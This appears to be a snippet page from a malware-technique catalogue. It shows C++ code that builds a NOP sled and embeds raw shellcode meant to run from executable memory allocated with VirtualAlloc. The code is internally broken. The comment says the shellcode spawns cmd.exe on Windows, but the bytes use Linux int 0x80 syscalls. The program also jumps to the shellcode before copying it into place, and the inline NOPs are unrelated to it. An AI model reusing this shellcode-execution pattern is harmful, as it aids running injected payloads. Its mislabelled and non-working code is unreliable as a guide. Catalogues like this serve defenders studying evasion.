(C++) NOP Sled by Unprotect

Created the Tuesday 06 December 2022. Updated 1 month, 3 weeks ago.

Description:

This code creates a NOP slide with eight NOP instructions and then inserts the shellcode at the end of the slide. When the program branches to the start of the code section, it will slide through the NOP instructions until it reaches the shellcode, which will then be executed. This demonstrates how a NOP slide can be used to direct program execution to a specific location when the exact branch target is not known.

Code

            #include <stdio.h>
#include <windows.h>

// Shellcode to spawn a cmd.exe process
unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                            "\x68\x63\x6d\x64\x00\x8b\xc4\x6a\x01\x50\x6a\x01\x6a\x02\x6a\x10"
                            "\x89\xe1\xb2\x0c\xcd\x80\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68"
                            "\x2f\x63\x61\x6c\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99"
                            "\xb0\x0b\xcd\x80";

int main() {
    // Insert a NOP slide at the start of the code section
    __asm__("nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n"
            "nop\n");

    // Insert the shellcode at the end of the NOP slide
    __asm__("jmp shellcode");

    // Allocate memory for the shellcode and copy it into place
    void *shellcode_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(shellcode_mem, shellcode, sizeof(shellcode));

    return 0;
}